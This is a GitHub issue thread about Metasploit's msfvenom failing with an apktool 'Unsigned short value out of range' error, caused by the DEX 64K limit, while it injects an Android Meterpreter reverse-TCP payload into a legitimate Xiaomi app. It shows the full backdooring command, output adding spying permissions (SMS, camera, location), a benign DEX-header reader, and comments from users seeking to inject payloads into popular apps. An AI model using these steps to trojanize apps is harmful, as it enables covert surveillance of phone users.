metasploit-framework
apktool execution failed: Unsigned short value out of range: 65577
When using a template APK file with msfvenom, injecting the Meterpreter payload may exceed the DEX 64K reference limit.
Android app (APK) files contain executable bytecode files in the form of Dalvik Executable (DEX) files, which contain the compiled code used to run your app. The Dalvik Executable specification limits the total number of methods that can be referenced within a single DEX file to 65,536—including Android framework methods, library methods, and methods in your own code. ~ https://developer.android.com/studio/build/multidex
See also: https://github.com/iBotPeaches/Apktool/issues/2496
# ./msfvenom -x apks/Xiaomi\ Security\ 6.0.5-220217.0.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: apks/Xiaomi Security 6.0.5-220217.0.2.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.miui.securitycenter.qefiu
[*] Loading /tmp/d20220313-315587-17xlikz/original/smali_classes2/com/miui/securitycenter/Application.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220313-315587-17xlikz/output.apk
[-] I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method La/c/d;->clone()La/c/d;
at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1047)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:346)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:301)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:426)
at brut.androlib.Androlib.buildSources(Androlib.java:357)
at brut.androlib.Androlib.build(Androlib.java:309)
at brut.androlib.Androlib.build(Androlib.java:276)
at brut.apktool.Main.cmdBuild(Main.java:255)
at brut.apktool.Main.main(Main.java:81)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1320)
at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1043)
... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65577
at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1280)
... 11 more
Error: apktool execution failed
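Added example, not part of the original issue and not Metasploit or Apktool code: a reader for the reference-table sizes in a DEX header, showing how close a classes*.dex from your own build is to the 64K limit and why an index such as 65577 cannot be written as a 16-bit operand. The names `dex_reference_counts`, `fits_ushort?` and `sample_header` are hypothetical, the header offsets follow the published Dalvik Executable format, and the sample sizes are constructed.

```ruby
# Added example: read the reference-table sizes from a DEX file header.
DEX_INDEX_LIMIT = 0x1_0000 # a 16-bit operand addresses indexes 0..65535

# Offsets of the little-endian uint32 *_ids_size fields in the 0x70-byte header.
ID_TABLE_OFFSETS = { type_ids: 0x40, field_ids: 0x50, method_ids: 0x58 }.freeze

# Returns { table => { count:, headroom: } } for the bytes of one classes*.dex.
def dex_reference_counts(bytes)
  bytes = bytes.b
  raise ArgumentError, 'shorter than a DEX header' if bytes.bytesize < 0x70
  raise ArgumentError, 'bad DEX magic' unless bytes.byteslice(0, 4) == "dex\n".b
  unless bytes.byteslice(0x28, 4).unpack1('V') == 0x12345678
    raise ArgumentError, 'unexpected endian_tag'
  end

  ID_TABLE_OFFSETS.transform_values do |offset|
    count = bytes.byteslice(offset, 4).unpack1('V')
    { count: count, headroom: DEX_INDEX_LIMIT - count }
  end
end

# True when an index fits an unsigned 16-bit instruction operand.
def fits_ushort?(index)
  index.between?(0, 0xFFFF)
end

# Constructed sample: a header-only buffer with chosen table sizes (not a real app).
def sample_header(types:, fields:, methods:)
  header = ("\0" * 0x70).b
  header[0, 8] = "dex\n035\0".b
  header[0x24, 4] = [0x70].pack('V')       # header_size
  header[0x28, 4] = [0x12345678].pack('V') # endian_tag
  { 0x40 => types, 0x50 => fields, 0x58 => methods }.each do |offset, size|
    header[offset, 4] = [size].pack('V')
  end
  header
end

if $PROGRAM_NAME == __FILE__
  # Pass paths to classes*.dex files from your own build; no arguments uses the sample.
  inputs = ARGV.to_h { |path| [path, File.binread(path)] }
  inputs['sample'] = sample_header(types: 9_000, fields: 41_000, methods: 65_500) if inputs.empty?
  inputs.each do |name, bytes|
    dex_reference_counts(bytes).each do |table, info|
      puts format('%-12s %-10s count=%5d headroom=%5d', name, table, info[:count], info[:headroom])
    end
  end
  puts "index 65577 fits in 16 bits? #{fits_ushort?(65_577)}"
end
```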
Did you find a solution for this? 2 days trying many times without success
> Did you find a solution for this? 2 days trying many times without success
No one is working on this issue. It has not been fixed in msfvenom.
Same error
After trying all the solutions possible, I am still getting ERROR: apktool execution failed. Please help me to fix this problem because none of the solutions are working.
Same error :(
I'm not sure if there's anything we can do here apart from give the user a better error message? Or try to get smaller payloads, but the same underlying issue would exist 🤔
> I'm not sure if there's anything we can do here
multidex apparently
> apart from give the user a better error message?
For now, as there's no intention to fix it, this issue exists as a reference for users who encounter this error.
The underlying message is from apktool. We could check for it and point users here.
> Or try to get smaller payloads, but the same underlying issue would exist 🤔
This is unlikely to help. Also, some popular APKs are suspiciously close to the DEX 64K reference limit, presumably to prevent injection.
So is there any way we can inject payload in popular apps?